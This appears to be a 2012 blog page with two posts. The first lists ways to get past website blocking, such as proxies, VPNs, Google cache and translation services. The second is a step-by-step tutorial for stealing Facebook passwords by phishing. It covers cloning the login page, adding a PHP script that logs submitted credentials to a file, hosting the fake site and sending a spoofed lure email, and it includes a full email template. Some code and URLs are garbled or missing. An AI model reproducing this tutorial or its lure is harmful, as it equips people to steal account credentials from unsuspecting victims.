Thursday, 6 December 2012

Top 10 Ways To Unblock The Websites

                         Top 10 Ways To Unblock The Websites

1. Use web proxies.

Many free online services allow you to access blocked websites through a proxy server. A proxy server is an intermediary between the user and the server where the request was send. Here is a list with the most known resources of web proxies:,,, and

2. Use VPN connections.

A VPN (Virtual Private Network) is like a tunnel over the public network. The advantage of using VPNs over web proxies is that VPNs are more secure because they are using advanced encryption and allow you to access all the applications (mail, chat, browser etc) in complete anonymity and not only the web sites. The most known free VPN is Hotspot Shield.

3. Use Hide IP software.

These are easy to use and even if the main functionality is to hide IP address and unblock websites, there are applications that can provide you more than that – like cleaning online tracks, testing proxies, manually adding proxy etc. Usually if you choose a free software, then this will provide you a minimal number of proxies and no other features than hiding IP address. Not My IP is one of the latest free hide IP address software that has already gained a large market followed by the old UltraSurf which is already very popular. Regarding paid applications that provide more features and have a complex structure, my recommendations are IP Privacy and Hide My IP.

4. Use Toolbars and Firefox add-ons.

Toolbars and Firefox add-ons are in fact software applications that work on specific browsers and with a simple click you can enable or disable online anonymity.

5. Use translation services.

Introduce the link of the blocked website in the translation field (for example in Google Translator) and choose a random language to translate from because translation from English to English is not supported.

6. Use Google cache.

In the Google search field type cache: before the URL of the blocked website. For example type cache:

7. Use Internet Archive.

Internet Archive allows you to view blocked websites through the Wayback Machine. This will retrieve all pages of a specific website indifferent if the website is blocked.

8. Use Web2Mail service.

Web2Mail it is a free email service that can sent to your email address specific web pages. You sign up for an account and get set to receive specific websites by email.

9. Change the http of an URL into https

This is the easiest way to access blocked websites. Of course, this might not work every time but you have many other solutions also. This is the fastest one.

10. Use IP address of the website instead of URL.

To use the IP address of a website instead of URL, you must first find its IP. To do this open command prompt and type: “ping”.

you should try once.........

Friday, 21 September 2012

How To Hack Facebook Account | Phishing

In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
First of all open in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.


Now replace this string with

action= “mail.php”

Now open notepad type following code in it and create mail.php.


header ('Location: ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to and select service and plan that suits you. Now in root folder of your website create Facebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.

Now sign up with it provides spoofed email service. Now create a message from to your victim.

Sub: Invalid activity on your facebook account

Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to by logging via typing in your web browser.